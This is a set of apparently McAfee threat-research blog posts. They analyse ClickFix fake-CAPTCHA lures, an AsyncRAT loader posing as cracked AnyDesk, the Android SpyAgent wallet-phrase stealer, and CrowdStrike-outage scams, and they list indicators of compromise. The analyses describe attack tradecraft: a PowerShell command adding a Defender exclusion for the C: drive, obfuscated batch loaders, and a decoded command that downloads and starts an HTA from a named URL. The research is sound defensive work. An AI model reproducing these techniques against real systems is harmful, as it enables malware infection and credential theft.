1. URL blocking of the fake CAPTCHA pages.

Figure 15: McAfee blocking URLs

2. Heuristic blocking of malicious use of mshta.

Figure 16: McAfee blocking the malicious behavior

Conclusion and Recommendations

In conclusion, the ClickFix infection chain demonstrates how cybercriminals exploit common user behaviors—such as downloading cracked software and responding to phishing emails—to distribute malware like Lumma Stealer. By leveraging fake CAPTCHA pages, attackers deceive users into executing malicious scripts that bypass detection, ultimately leading to malware installation.

The infection chain operates through two main vectors: cracked gaming software download URLs and phishing emails impersonating GitHub. In both cases, users are redirected to malicious CAPTCHA pages where scripts are executed to download and install malware. The use of multi-layered encryption further complicates detection and analysis, making these attacks more sophisticated and harder to prevent.

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:

1. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
2. Install and maintain updated antivirus and anti-malware software on all endpoints.
3. Implement robust email filtering to block phishing emails and malicious attachments.
4. Use network segmentation to limit the spread of malware within the organization.
5. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
6. Avoid downloading cracked software or visiting suspicious websites.
7. Verify URLs in emails, especially from unknown or unexpected sources.
8. Restrict clipboard-based scripts and disable automatic script execution.
9. Keep antivirus solutions updated and actively scan.
10. Educate users to avoid suspicious CAPTCHA prompts on untrusted sites.
11. Regularly patch browsers, operating systems, and applications.
12. Monitor the Temp folder for unusual or suspicious files.

Indicators of Compromise (IoCs)

File Type	SHA256/URLs
	Fake Captcha Websites
URL	Ofsetvideofre[.]click/
URL	Newvideozones[.]click/veri[.]html
URL	Clickthistogo[.]com/go/67fe87ca-a2d4-48ae-9352-c5453156df67?var_3=F60A0050-6F56-11EF-AA98-FFC33B7D3D59
URL	Downloadstep[.]com/go/08a742f2-0a36-4a00-a979-885700e3028c
URL	Betterdirectit[.]com/
URL URL	Betterdirectit[.]com/go/67fe87ca-a2d4-48ae-9352-c5453156df67 heroic-genie-2b372e[.]netlify[.]app/please-verify-z[.]html
URL	Downloadstep[.]com/go/79553157-f8b8-440b-ae81-0d81d8fa17c4
URL	Downloadsbeta[.]com/go/08a742f2-0a36-4a00-a979-885700e3028c
URL	Streamingsplays[.]com/go/6754805d-41c5-46b7-929f-6655b02fce2c
URL	Streamingsplays[.]com/go/b11f973d-01d4-4a5b-8af3-139daaa5443f
URL	Streamingszone[.]com/go/b3ddd860-89c0-448c-937d-acf02f7a766f?c=AOsl62afSQUAEX4CAEJPFwASAAAAAABQ
URL	Streamingsplays[.]com/go/1c406539-b787-4493-a61b-f4ea31ffbd56
URL	github-scanner[.]shop/
URL	github-scanner[.]com/
URL	botcheck.b-cdn[.]net/captcha-verify-v7.html

 

	Redirecting Websites
URL	Rungamepc[.]ru/?load=Black-Myth-Wukong-crack
URL	game02-com[.]ru/?load=Cities-Skylines-2-Crack-Setup
URL	Rungamepc[.]ru/?load=Dragons-Dogma-2-Crack
URL	Rungamepc[.]ru/?load=Dying-Light-2-Crack
URL	Rungamepc[.]ru/?load=Monster-Hunter-Rise-Crack

 

	Websites Containing Malicious URLs
URL	Runkit[.]com/wukong/black-myth-wukong-crack-pc
URL	Runkit[.]com/skylinespc/cities-skylines-ii-crack-pc-full-setup
URL	Runkit[.]com/masterposte/dying-light-2-crack-on-pc-denuvo-fix
URL	Runkit[.]com/dz4583276/monster-hunter-rise-crack-codex-pc/1.0.0/clone
URL	Groups[.]google[.]com/g/hogwarts-legacy-crack-empress
URL	By[.]tribuna[.]com/extreme/blogs/3143511-black-myth-wukong-full-unlock/

 

	Malware Samples
PS	b6a016ef240d94f86e20339c0093a8fa377767094276730acd96d878e0e1d624
PS	cc29f33c1450e19b9632ec768ad4c8c6adbf35adaa3e1de5e19b2213d5cc9a54
ZIP	632816db4e3642c8f0950250180dfffe3d37dca7219492f9557faf0ed78ced7c
ZIP	19d04a09e2b691f4fb3c2111d308dcfa2651328dfddef701d86c726dce4a334a
EXE	d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207
EXE	bbf7154f14d736f0c8491fb9fb44d2f179cdb02d34ab54c04466fa0702ea7d55
HTA	fa58022d69ca123cbc1bef13467d6853b2d55b12563afdbb81fc64b0d8a1d511

 

The post Behind the CAPTCHA: A Clever Gateway of Malware appeared first on McAfee Blog.

Cracked Software or Cyber Trap? The Rising Danger of AsyncRAT Malware

Authored by Neil Tyagi

In cybersecurity, threats constantly evolve, and new ways to exploit unsuspecting users are being found. One of the latest menaces is a recent AsyncRAT variant, a sophisticated remote access trojan (RAT) that’s been making waves by marketing itself as cracked software. This tactic plays on the desire for free access to premium software, luring users into downloading what appears to be a harmless application. However, beneath the surface lies dangerous malware designed to infiltrate systems, steal sensitive information, and give cybercriminals complete control over infected devices.

In this blog, we’ll examine the mechanics of AsyncRAT, how it spreads by masquerading as cracked software, and the steps you can take to protect yourself from this increasingly common cyber threat.

McAfee telemetry data shows this threat has been in the wild since March 2024 and is prevalent with infected hosts worldwide.

• • We have many initial vectors for this chain, masquerading as different software

• • Theme: CCleaner. Hash: 6f976e1b53271178c2371bec7f64bd9cf2a2f936dc9670c40227c9d7ea56b8e6

• • Theme: Sidify Music Converter. Hash: 9aaabe9807f9ba1ad83bbb33b94648d32054f9dc575a5b77f92876d018eed91c

• • Theme: Ease US Partition Master. Hash: 84521572d3baeb218996daa3ab13be288b197095a677940146bf7a0285b71306

• • Theme: YouTube Downloader Hash: 00a1afd74d1a40593539a4e9115ab4c390cad9024d89931bd40d4279c95e9b6a

• • Asyncrat is coming in the theme of AnyDesk software. HASH: 2f1703c890439d5d6850ea1727b94d15346e53520048b694f510ed179c881f72
  • In this blog, we will analyze the AnyDesk-themed malware; the other noted themes are similar in nature.
  • Also, note that the setup.dll file shown in the above pictures is the same as it has the same hash.

• • Anydesk 8.0.6 Portable.exe is a 64-bit .NET file. However, it is not the original Anydesk file; it is malware.

• • Carried within the malware is an Anydesk.data file, the genuine anydesk application.

• • We can confirm that the Anydesk. data file has a valid digital signature from the publishers of Anydesk software.

• • When we rename the anydesk.data file to anydesk.exe, we can also see the anydesk software running.

• • Setup.dll is a bat file, as we can see in the above image
  • We start debugging by putting the malicious AnyDesk executable into the Dnspy tool to review the source code.
    

• • The primary function calls the IsAdmin function, which checks the current context of the running process. Based on this, it calls four functions in succession: AddExclusion, CopyAndRenameFile, RunScript, and ExecuteScript. We will check each function call separately.
    

• • The AddExlusion function passes the above string into the RunHiddenCommand Function.
    

• • Runhidden command will take that string, launch an instance of PowerShell, and execute that string as an argument.
  • This will effectively add a Windows Defender scan exclusion for the entire C drive.
    

• The CopyAndRenameFile Function will rename the setup.dll file to the setup.bat file and copy it to the appdata\local\temp folder.

• • After the bat file is copied to the temp folder, it will be executed using a process start call.
    

• • Now, to convince the user that he has indeed opened the AnyDesk software, the AnyDesk.data file containing the original AnyDesk software will be renamed AnyDesk.exe.
  • This is the whole purpose of the malware AnyDesk.exe file. Now, the attack chains move to execute the bat script, which we will analyze further.
    

• The bat file uses dos obfuscation
• It is setting environment variables to be used later during execution.
• Also, lines 6 and 7 have two long comments and an encrypted payload.
• In line 13, it echoes something and pipes it to the %Ahmpty% environment variable.

• • We can easily deobfuscate the strings by launching an instance of cmd, executing the set commands, and echoing the contents of the variables.
  • One thing to note here is that %variablename% will echo the entire contents of the variable, but %varibalename:string=% will replace any occurrence of “string” in the contents of “variable name” with a null character.
    

• • The above image is after deobfuscation of all strings and formatting of the script in a human-readable form.
  • Script first sets @echo as off
  • Then, it checks if the environment variable Ajlp is set. If not, it sets Ajlp to 1 and again starts the execution of the bat script (%0 contains the path to the same script) in minimized form, exiting the original script.
  • Then we have our two comments, which later turn out to be encrypted payloads
  • Then the script checks which version of PowerShell is present on the system because, for older versions of Windows, PowerShell is sometimes located in the syswow64 folder. For successful exploitation of those versions of Windows, this check is done
  • Then, a long script is echoed at the end and piped for execution to PowerShell.
  • One interesting thing to note is that %~0 is echoed as part of the script and passed to PowerShell for execution. This trick passes the path of the bat script to the PowerShell script for further processing.
    

• • Difference b/w contents of %0 and %~0 variable, you can notice they only differ in double quotes.
    

• • Moving on to the PowerShell script, we can see it sets the PowerShell window title to the path of the bat script using the $host. UI.RawUI.WindowTitle call.
  • As we saw before, this path of bat script was passed to it during echo of %~0 environment variable in bat script.
  • Then we have some string replacement operations.
    

• • We can see the contents of the variable after the string replacement operation is done. It is being used to hide strings with malicious intent, such as invoke, load,frombase64string, etc.
  • Then we have a command to hide the PowerShell window
  • Then we have two functions. The first one is used for AES decryption, and the second one is used for Gzip decompression
  • Then, we have some operations that we will investigate in detail next.
  • Then we have two calls to System.reflection.assembly, which reflectively loads the assembly into memory.
    

• This is the deobfuscated and high-level view of the script for easy readability.

• • We can see that the $lmyiu variable contains the contents of the entire bat file. It reads using the System.IO.File call, which takes a parameter of the path supplied through [console]: Title. We know the title was set to the path of the original bat script at the beginning.
  • Now, indexes 5 and 6 are being read from the bat file, which translates to lines 5 and 6, which contain the comments (indexing starts from 0).
  • Now, the first two characters are removed using substring to remove the two colons (::) which represent a comment in the bat file
  • In the above image, we can see the output of that line, which contains the comment.
  • Now, the comment is converted from a base64 string and passed to a function that does AES decryption. The result is passed into a function that does GZIP decryption and stored in the assembly1 variable. The same thing happens for the second comment to get the second assembly.
  • Once both assemblies are decrypted, they are reflectively loaded into memory using the System.reflection.assembly call.
    

• We can dump the two decrypted assemblies onto the disk for further analysis, as shown in the above image.
• After writing to disk, we load both assemblies in CFF Explorer.

• Assembly1 in CFFExplorer.

• • Assembly2 in CFFExplorer.
    

• • We load both assemblies into Dnspy for further debugging.
  • We can see that both assemblies are heavily obfuscated using Confuser Packer, and their contents are not easily readable for analysis.

• This is intended to slow down the debugging process.
  
• We will use the .NET reactor slayer to deobfuscate the two assemblies. This will remove the confusing obfuscation and give us readable assemblies.
• We use it for both assemblies and write the deobfuscated versions to disk.

• When we load the assemblies into Dnspy, we see they have cleaned up nicely, and confuser obfuscation is entirely removed.
• We can see first it checks the console title of the current process.
• We can also see a few anti-debugging API calls, IsDebuggerPresent and CheckRemoteDebuggerPresent. If any of these calls return true, the program exists.
• After that, there is a call to smethod_3

• • Inspecting the smethod_3 function, we see some encrypted strings, all of which are being passed as arguments to the smethod_0 function.
    

• • By checking the smethod_0 function, we get the StringBuilder function, which will be used to convert the encoded strings into readable form.
    

• We put a breakpoint on the return call to see the decoded string being populated in the local window in case it is related to a scheduled task.

• Checking further, we get the call where the assembly is being written to disk in the appdata\Roaming folder with the name Network67895Man.cmd using the file.WriteAllBytes call. We can inspect the arguments in the local window.

• In the above image, we see that the Network67895Man.cmd file is being executed using the process. Start call.

• We can confirm that the hash of Network67895Man.cmd and our assembly are the same. We can also visually confirm that the file is in the appdata\roaming folder.

• Now that we see the persistence mechanism, we can see the return value of our string builder function related to the scheduled task.

• We copy the complete string and inspect it in Notepad++. We see that the PowerShell command is used to schedule a task named ‘OneNote 67895’. This will trigger At Logon, and the action is the execution of the Network67895Man.cmd file with some more parameters.

• • We can confirm the task being scheduled in the Task Scheduler window.
  • Moving on, see how the next stage is decrypted and loaded into memory
    

 

• One thing to observe here is that this assembly contains a resource named P, which turns out to contain the encrypted next-stage payload.

• • Dumping the resource onto disk and checking its content, we see the encrypted payload bytes starting from 1F 8B 08 00…
    

• In the local window, we can see the string P is being passed to the smethod_3 function, which will read the resource stream and the bytes of the P resource.

• We can confirm that the bytes have been read from the resource and can be seen in the local window in the result variable. We can see the same bytes, i.e., 1F 8B 08 00.

• Now, we put a breakpoint on the load call and inspect the contents of the raw assembly variable to see the decrypted payload.
• We dump it on the desk for further inspection.

• Checking it in CFF Explorer, we see this is also a 32-bit. net assembly file with internal name of stub.exe

• • Putting it in Dnspy, we can see an unobfuscated Asyncrat client payload named AsyncClient.
  • We can see all the functions in clear text, like Anti-analysis, Lime logger, mutex control, etc.
  • This is the final Asyncrat client payload that we have got after so many layers of the attack chain.We will now see some interesting features of the Asyncrat payload.
    

• • We can see it has its own persistence mechanism, which checks if the file is running as admin. If true, it creates a scheduled task by launching cmd.exe; otherwise, it creates a run key in the Windows registry for persistence.
    

• We can see the encrypted config of the Asyncrat client, including the port used, host, version, key, etc.

• We can see the decrypt method is called on each config parameter. In the above image, we have documented the Asyncrat CNC domain that it is using, orostros.mywire.org
• It turns out that this is a dynamic DNS service that the malware author is abusing to their advantage.

In conclusion, the rise of AsyncRAT and its distribution via masquerading as cracked software highlights the evolving tactics, techniques, and procedures (TTPs) employed by cybercriminals. By exploiting the lure of free software, these attackers are gaining unauthorized access to countless systems, jeopardizing sensitive information and digital assets.

Understanding these TTPs is crucial for anyone looking to protect themselves from such threats. However, awareness alone isn’t enough. To truly safeguard your digital presence, it’s essential to use reliable security solutions. McAfee antivirus software offers comprehensive protection against various threats, including malware like AsyncRAT. With real-time scanning, advanced threat detection, and continuous updates, McAfee ensures your devices remain secure from the latest cyber threats.

Don’t leave your digital assets vulnerable. Equip yourself with the right tools and stay one step ahead of cybercriminals. Your security is in your hands—make it a priority today.

The post Cracked Software or Cyber Trap? The Rising Danger of AsyncRAT Malware appeared first on McAfee Blog.

New Android SpyAgent Campaign Steals Crypto Credentials via Image Recognition

Authored by SangRyol Ryu

Recently, McAfee’s Mobile Research Team uncovered a new type of mobile malware that targets mnemonic keys by scanning for images on your device that might contain them. A mnemonic key is essentially a 12-word phrase that helps you recover your cryptocurrency wallets. It’s much simpler to remember than the typical complex “private key” it stands for.

This Android malware cleverly disguises itself as various trustworthy apps, ranging from banking and government services to TV streaming and utilities. However, once installed, these fake apps secretly gather and send your text messages, contacts, and all stored images to remote servers. They often distract users with endless loading screens, unexpected redirects, or brief blank screens to hide their true activities.

McAfee has identified over 280 fake applications involved in this scheme, which have been actively targeting users in Korea since January 2024. Thankfully, McAfee Mobile Security products are already on the lookout for this threat, known as SpyAgent, and are helping to keep your device safe from these deceptive tactics.

Figure 1 Timeline of this campaign

Distribution Mechanism

Mobile malware that targets users in Korea is mainly spread through clever phishing campaigns. These campaigns use text messages or direct messages on social media to send out harmful links. The attackers behind these messages often pretend to be organizations or people you trust, tricking you into clicking on their links. Once clicked, these links take you to fake websites that look incredibly real, mimicking the appearance of legitimate sites. These deceptive sites usually prompt you to download an app, which is how the malware gets installed on your device. Be cautious and always verify the authenticity of any message or link before clicking.

Figure 2 Fake Websites

When a user clicks on the download link, they are prompted to download an APK (Android Package Kit) file. Although this file appears to be a legitimate app, it is actually malicious software. Once the APK is downloaded, the user is asked to install the app. During installation, the app requests permission to access sensitive information such as SMS messages, contacts, and storage, and to run in the background. These permissions are often presented as necessary for the app to function properly, but in reality, they are used to compromise the user’s privacy and security.

Figure 3 App installation and requesting permissions

Malware Capabilities and Behavior

Once the app is installed and launched, it begins its main function of stealing sensitive information from the user and sending it to a remote server controlled by the attackers. The types of data it targets include:

• Contacts: The malware pulls the user’s entire contact list, which could be used for further deceptive practices or to spread the malware even further.
• SMS Messages: It captures and sends out all incoming SMS messages, which might include private codes used for two-factor authentication or other important information.
• Photos: The app uploads any images stored on the device to the attackers’ server. These could be personal photos or other sensitive images.
• Device Information: It gathers details about the device itself, like the operating system version and phone numbers. This information helps the attackers customize their malicious activities to be more effective.

The malware functions like an agent, capable of receiving and carrying out instructions from the remote server. These commands include:

• ‘ack_contact’: A confirmation signal that the server has received the contacts list.
• ‘ack_sms’: A confirmation signal that the server has received SMS messages.
• ‘ack_image’: A confirmation signal that the server has received images.
• ‘sound_mode_update’: A command that changes the sound settings of the device.
• ‘send_sms’: A command that enables the malware to send SMS messages from the device, which could be used to distribute phishing texts.

Command and Control Servers Investigation

During the investigation, the team discovered several key insights:

Insecure Command and Control Server: Several C2 servers were found to have weak security configurations, which allowed unauthorized access to specific index pages and files without needing credentials. This security lapse provided a deeper insight into the server’s functions and the types of data being gathered.

Upon examination, it was noted that the server’s root directory included multiple folders, each organized for different facets of the operation, such as mimicking banking institutions or postal services.

Figure 4 Exposed Indexing page of the root prior to the site being taken down

Due to the server’s misconfiguration, not only were its internal components unintentionally exposed, but the sensitive personal data of victims, which had been compromised, also became publicly accessible. In the ‘uploads’ directory, individual folders were found, each containing photos collected from the victims, highlighting the severity of the data breach.

Figure 5 Leaked images list from one of the victims of the ‘aepost’ campaign prior to the site being taken down

Admin Pages: Navigating from the exposed index pages led to admin pages designed for managing victims. These pages displayed a list of devices, complete with device information and various controllable actions. As the number of victims rises, the list of devices on these pages will expand accordingly.

Figure 6 Admin control panel

Targeting Cryptocurrency Wallets: Upon examining the page, it became clear that a primary goal of the attackers was to obtain the mnemonic recovery phrases for cryptocurrency wallets. This suggests a major emphasis on gaining entry to and possibly depleting the crypto assets of victims.

Figure 7 OCR details on Admin page

Data Processing and Management: This threat utilizes Python and Javascript on the server-side to process the stolen data. Specifically, images are converted to text using optical character recognition (OCR) techniques, which are then organized and managed through an administrative panel. This process suggests a high level of sophistication in handling and utilizing the stolen information.

Figure 8 Server-side OCR code

Evolution

Originally, the malware communicated with its command and control (C2) server via simple HTTP requests. While this method was effective, it was also relatively easy for security tools to track and block. In a significant tactical shift, the malware has now adopted WebSocket connections for its communications. This upgrade allows for more efficient, real-time, two-way interactions with the C2 server and helps it avoid detection by traditional HTTP-based network monitoring tools. This change also makes it more challenging for security researchers to analyze traffic and intercept malicious communications.

The malware has also seen substantial improvements in its obfuscation techniques, which further complicates detection efforts by security software and researchers. APK obfuscation now conceals malicious code using strategies like string encoding, the insertion of irrelevant code, and the renaming of functions and variables to confuse analysts. These methods not only create confusion but also delay the detection process, effectively masking the malware’s true operations.

Moreover, the malware’s application and targeting strategies have evolved. Recent observations indicate that the malware has adapted and begun to spread within the UK. This development is significant as it shows that the threat actors are expanding their focus both demographically and geographically. The move into the UK points to a deliberate attempt by the attackers to broaden their operations, likely aiming at new user groups with localized versions of the malware.

Conclusion

The continuous evolution of this malware highlights the ever-changing and sophisticated nature of cyber threats today. Initially masquerading as apps for money loans or government services, it has now adapted to exploit personal emotions by mimicking obituary notices. The research team has discovered that the perpetrators are utilizing OCR technology to analyze and misuse the stolen data for financial benefits. As the malware advances, employing more intricate methods, forecasting its next moves becomes increasingly challenging. Cybercriminals are constantly enhancing their tactics to better infiltrate and manipulate user environments, escalating the danger posed by these threats over time.

Although this malware is not widely prevalent, its impact intensifies when it leverages a victim’s contacts to send deceptive SMS messages. These phishing messages, seemingly sent by a familiar contact, are more likely to be trusted and acted upon by recipients. For instance, an obituary notice appearing to come from a friend’s number could be perceived as authentic, greatly raising the likelihood of the recipient engaging with the scam, especially compared to phishing attempts from unknown sources. This strategy introduces a deceptive layer that significantly enhances the effectiveness and stealthiness of the attack. Early detection of such malware is critical to prevent its proliferation, minimize potential harm, and curb further escalation. In response, the team has taken proactive steps by reporting the active URLs to the relevant content providers, who have promptly removed them.

The discovery of an item labeled “iPhone” in the admin panel indicates that the next stage of this malware’s development might target iOS users. While no direct evidence of an iOS-compatible version has been found yet, the possibility of its existence is genuine. Our team has previously documented data-stealing activities affecting both Android and iOS platforms, suggesting that the threat actors might be working on an iOS variant. This is particularly alarming because, despite iOS’s reputation for security, there are still methods for installing malicious apps outside of the App Store, such as through enterprise certificates and tools like Scalet. This potential shift to iOS highlights the need for vigilance across all mobile platforms.

In such a landscape, it is crucial for users to be cautious about their actions, like installing apps and granting permissions. It is advisable to keep important information securely stored and isolated from devices. Security software has become not just a recommendation but a necessity for protecting devices. The McAfee Mobile Research team continues to stay alert, implementing robust security measures to counter these advanced threats. McAfee Mobile Security products are designed to detect and defend against not only malware but also other unwanted software. For further details, please visit our McAfee Mobile Security website.

Indicators of Compromise

SHA256 Hash(es):

• 5b634ac2eecc2bb83c0403edba30a42cc4b564a3b5f7777fe9dada3cd87fd761
• 4cf35835637e3a16da8e285c1b531b3f56e1cc1d8f6586a7e6d26dd333b89fcf
• 3d69eab1d8ce85d405c194b30ac9cc01f093a0d5a6098fe47e82ec99509f930d
• 789374c325b1c687c42c8a2ac64186c31755bfbdd2f247995d3aa2d4b6c1190a
• 34c2a314dcbb5230bf79e85beaf03c8cee1db2b784adf77237ec425a533ec634
• f7c4c6ecbad94af8638b0b350faff54cb7345cf06716797769c3c8da8babaaeb
• 94aea07f38e5dfe861c28d005d019edd69887bc30dcc3387b7ded76938827528
• 1d9afa23f9d2ab95e3c2aecbb6ce431980da50ab9dea0d7698799b177192c798
• 19060263a9d3401e6f537b5d9e6991af637e1acb5684dbb9e55d2d9de66450f2
• 0ca26d6ed1505712b454719cb062c7fbdc5ae626191112eb306240d705e9ed23
• d340829ed4fe3c5b9e0b998b8a1afda92ca257732266e3ca91ef4f4b4dc719f8
• 149bd232175659434bbeed9f12c8dd369d888b22afaf2faabc684c8ff2096f8c
• f9509e5e48744ccef5bfd805938bf900128af4e03aeb7ec21c1e5a78943c72e7
• 26d761fac1bd819a609654910bfe6537f42f646df5fc9a06a186bbf685eef05b
• 0e778b6d334e8d114e959227b4424efe5bc7ffe5e943c71bce8aa577e2ab7cdb
• 8bbcfe8555d61a9c033811892c563f250480ee6809856933121a3e475dd50c18
• 373e5a2ee916a13ff3fc192fb59dcd1d4e84567475311f05f83ad6d0313c1b3b
• 7d346bc965d45764a95c43e616658d487a042d4573b2fdae2be32a0b114ecee6
• 1bff1823805d95a517863854dd26bbeaa7f7f83c423454e9abd74612899c4484
• 020c51ca238439080ec12f7d4bc4ddbdcf79664428cd0fb5e7f75337eff11d8a

Domain(s):

• ahd.lat 

• allsdy999.org 

• etr.lat 

• gf79.org 

• goodapps.top 

• gov24.me 

• gov24.top 

• krgoodapp.top 

• krgov24.top 

• like1902.xyz 

• make69.info 

• messtube999.info 

• mtube888.info 

• mylove777.org 

• oktube999.info 

• top1114.online 

• ytube888.info 

The post New Android SpyAgent Campaign Steals Crypto Credentials via Image Recognition appeared first on McAfee Blog.

The Scam Strikes Back: Exploiting the CrowdStrike Outage

Authored by Lakshya Mathur, Vallabh Chole & Abhishek Karnik

Recently we witnessed one of the most significant IT disruptions in history, affecting a wide range of sectors such as banking, airlines, and emergency services. At the heart of this disruption was CrowdStrike, known for its Falcon enterprise security solutions. The issue stemmed from a faulty security update that corrupted the Windows OS kernel, leading to a widespread Blue Screen of Death (BSOD).

The incident spurred opportunistic behaviors among scammers and malware creators. McAfee Labs noted:

• Non-Delivery Scams: Early signs of potential non-delivery scams shortly after the event, with some online stores quickly marketing merchandise that mocked the CrowdStrike incident.
• Domain Spoofing: A noticeable surge in domain registrations containing the term “CrowdStrike” following the onset of the outage, there was Scammers may register domain names to trick people into thinking the site is related to a legitimate or familiar company, to deceive users into visiting the site for phishing attacks, spreading malware, or collecting sensitive information.
• Malware: Malware developers swiftly disguised harmful software like Remcos, Wiper, and Stealers as remediation tools for the outage. Unsuspecting people may have downloaded this software in an effort to restore their systems.

Voice Scams: There were also reports of robocalls offering assistance for these issues, though these claims have not been verified by McAfee.

It’s important to note that Mac and Linux users were unaffected by this incident, as the problems were confined to Windows systems. Furthermore, since CrowdStrike primarily serves the enterprise market, the crashes predominantly affected business services rather than personal consumer systems. However, the ripple effects of the disruption may have caused inconvenience for consumers dealing with affected service providers, and all consumers should be extra vigilant regarding unsolicited communications from sources claiming to be an impacted business.

This blog outlines the various malware threats and scams observed since the outage occurred on Friday, July 19, 2024.

CrowdStrike Themed Malware

• Stealer payload via doc-based Macros

This file, which seems to provide recovery guidelines, covertly incorporates a macro that silently installs malware designed to steal information.

Malicious doc first page

Infection Chain

Zip -> Doc -> Cmd.exe -> Curl.exe -> Malicious URL -> Rundll32.exe -> Infostealer DLL payload

Doc file uses malicious macros, Curl.exe and Certutil.exe to download malicious infostealer DLL payload.

The stealer terminates all running Browser processes and then tries to steal login data and coolies from different browsers. All the stolen data is saved under %Temp% folder in a text file. This data is sent to the attacker’s C2 server.

• PDF file downloading Wiper Malware

Attackers use a PDF file and malicious spam to trick victims into downloading a supposed recovery tool. Clicking the provided link connects to a malicious URL, which then downloads a Wiper malware payload. This data wiper is extracted under %Temp% folder and its main purpose is to destroy data stored on the victim’s device.

PDF file with CrowdStrike remediation tool theme

Infection Chain

PDF -> Malicious URL -> Zip -> Wiper payload

• Remcos RAT delivered with CrowdStrike Fix theme

Zip files labeled “crowdstrike-hotfix.zip” that carry Hijack Loader malware, which then deploys Remcos RAT, have been observed being distributed to victims. Additionally, the zip file includes a text file with instructions on how to execute the .exe file to resolve the issue.

Remcos RAT allows attackers to take remote access to the victim’s machine and steal sensitive information from their system.

CrowdStrike Outage Impersonated Domains & URLs

Once the outage gained media attention, numerous domains containing the word “crowdstrike” were registered, aimed at manipulating search engine results. Over the weekend, several of these newly registered domains became active.

Here are some examples:

• Payment related domains

https[:]//pay.crowdstrikerecovery[.]com/ , pay[.]clown-strike[.]com , pay[.]strikeralliance[.]com

The rogue domains lead to the payments page

• Parked domains

Crowdstrike-helpdesk[.]com

Domains that are currently parked and not live

• Additionally, numerous cryptocurrency wallets were established using a theme inspired by CrowdStrike.

twitter[.]com/CrowdStrikeETH/

Some other wallets related to CrowdStrike Outage apart from above mentioned.

bitcoin:1M8jsPNgELuoXXXXXXXXXXXyDNvaxXLsoT

ethereum:0x1AEAe8c6XXXXXXXXXXX76ac49bb3816A4eB4455b

To summarize, the majority of consumers using devices at home might not be directly affected by this incident. However, if you have experienced issues such as airline delays, banking disruptions, healthcare, or similar service interruptions since July 19th, they could be related to this event.

Be wary if you receive phone calls, SMS messages, emails, or any form of contact offering assistance to remedy this situation. Unless you operate a business that uses CrowdStrike, you are likely not affected.

For the remediation process and steps follow the official article from CrowdStrike – https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/

List of known malware hashes and potentially unwanted domains:

Hashes	Type
96dec6e07229201a02f538310815c695cf6147c548ff1c6a0def2fe38f3dcbc8	Wiper Zip
803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61	Stealer Docx
c44506fe6e1ede5a104008755abf5b6ace51f1a84ad656a2dccc7f2c39c0eca2	RemcosRAT Zip
19001dd441e50233d7f0addb4fcd405a70ac3d5e310ff20b331d6f1a29c634f0	Wiper PDF
d6d5ff8e9dc6d2b195a6715280c2f1ba471048a7ce68d256040672b801fda0ea	RemcosRAT DLL
4491901eff338ab52c85a77a3fbd3ce80fda738046ee3b7da7be468da5b331a3	Wiper EXE

 

Domains

hxxps://crowdstrike0day[.]com

hxxps://crowdstrikefix[.]com

hxxps://crowdstrike-bsod[.]com

hxxps://crowdstrikedoomsday[.]com

hxxps://crowdstrikedown[.]site

hxxps://www[.]crowdstriketoken[.]com

hxxps://crowdstriketoken[.]com

hxxps://crowdstrikebsod[.]com

hxxps://fix-crowdstrike-apocalypse[.]com

hxxp://crowdfalcon-immed-update[.]com

hxxp://crowdstrikefix[.]com

hxxp://fix-crowdstrike-apocalypse[.]com

hxxps://crowdstrike[.]phpartners[.]org

hxxps://www[.]crowdstrikefix[.]com

hxxp://crowdstrikebsod[.]com

hxxp://crowdstrikeclaim[.]com

hxxp://crowdstrikeupdate[.]com

hxxp://crowdstrike[.]buzz

hxxp://crowdstrike0day[.]com

hxxp://crowdstrike-bsod[.]com

hxxp://crowdstrikedoomsday[.]com

hxxp://crowdstrikedown[.]site

hxxp://crowdstrikefix[.]zip

hxxp://crowdstrike-helpdesk[.]com

hxxp://crowdstrikeoutage[.]info

hxxp://crowdstrikereport[.]com

hxxp://crowdstriketoken[.]com

hxxp://crowdstuck[.]org

hxxp://fix-crowdstrike-bsod[.]com

hxxp://microsoftcrowdstrike[.]com

hxxp://microsoftcrowdstrike[.]com/

hxxp://whatiscrowdstrike[.]com

hxxp://www[.]crowdstrikefix[.]com

 

The post The Scam Strikes Back: Exploiting the CrowdStrike Outage appeared first on McAfee Blog.

ClickFix Deception: A Social Engineering Tactic to Deploy Malware

Authored by Yashvi Shah and Vignesh Dhatchanamoorthy

McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as the “Clickfix” infection chain. The attack chain begins with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.

The “ClickFix” infection chain represents a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.

We have observed malware families such as Lumma Stealer and DarkGate leveraging this technique. Here is the heatmap showing the distribution of users affected by the “Clickfix” technique:

Figure 1:Prevalence for the last three months

Darkgate ingesting via “ClickFix”

DarkGate is a sophisticated malware known for its ability to steal sensitive information, provide remote access, and establish persistent backdoors in compromised systems. It employs advanced evasion tactics and can spread within networks, making it a significant cybersecurity threat.
McAfee Labs obtained a phishing email from the spamtrap, having an HTML attachment.

Figure 2: Email with Attachment

The HTML file masquerades as a Word document, displaying an error prompt to deceive users. This tactic is used to trick users into taking actions that could lead to the download and execution of malicious software.

Figure 3: Displays extension problem issue

As shown, the sample displays a message stating, “The ‘Word Online’ extension is NOT installed in your browser. To view the document offline, click the ‘How to fix’ button.”

Before clicking on this button, let’s examine the underlying code. Upon examining the code, it was discovered that there were several base64-encoded content blocks present. Of particular significance was one found within the <Title> tag, which played a crucial role in this scenario.

Figure 4: HTML contains Base64-encoded content in the title tag

Decoding this we get,

Figure 5: After decoding the code

The decoded command demands PowerShell to carry out malicious activities on a system. It starts by downloading an HTA (HTML Application) file from the URL https://www.rockcreekdds.com/wp-content/1[.]hta and saves it locally as C:\users\public\Ix.hta.

The script then executes this HTA file using the start-process command, which initiates harmful actions on the system. Additionally, the script includes a command (Set-Clipboard -Value ‘ ‘) to clear the contents of the clipboard. After completing its tasks, the script terminates the PowerShell session with exit.

